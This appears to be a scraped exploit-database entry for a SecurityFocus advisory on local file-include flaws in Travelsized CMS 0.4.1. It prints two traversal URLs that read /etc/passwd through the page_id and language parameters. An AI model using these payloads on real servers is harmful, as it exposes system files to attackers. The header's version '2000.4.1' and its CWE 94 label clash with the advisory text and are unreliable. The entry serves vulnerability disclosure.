header-logo
Suggest Exploit
vendor:
CMS
by:
SecurityFocus
7.5
CVSS
HIGH
Local File Include
94
CWE
Product Name: CMS
Affected Version From: 2000.4.1
Affected Version To: 2000.4.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Travelsized CMS Local File Include Vulnerabilities

Travelsized CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. Exploiting these issues may allow an attacker to access potentially sensitive information in the context of the affected application. Examples of vulnerable URLs include: http://www.example.com/travelsized-0.4.1/index.php?page_id=../../../../../../../../../../etc/passwd%00 and http://www.example.com/travelsized-0.4.1/index.php?language=../../../../../../../../../../etc/passwd%00

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/28218/info

Travelsized CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

Exploiting these issues may allow an attacker to access potentially sensitive information in the context of the affected application.

Travelsized CMS 0.4.1 is vulnerale; other versions may also be affected. 

http://www.example.com/travelsized-0.4.1/index.php?page_id=../../../../../../../../../../etc/passwd%00
http://www.example.com/travelsized-0.4.1/index.php?language=../../../../../../../../../../etc/passwd%00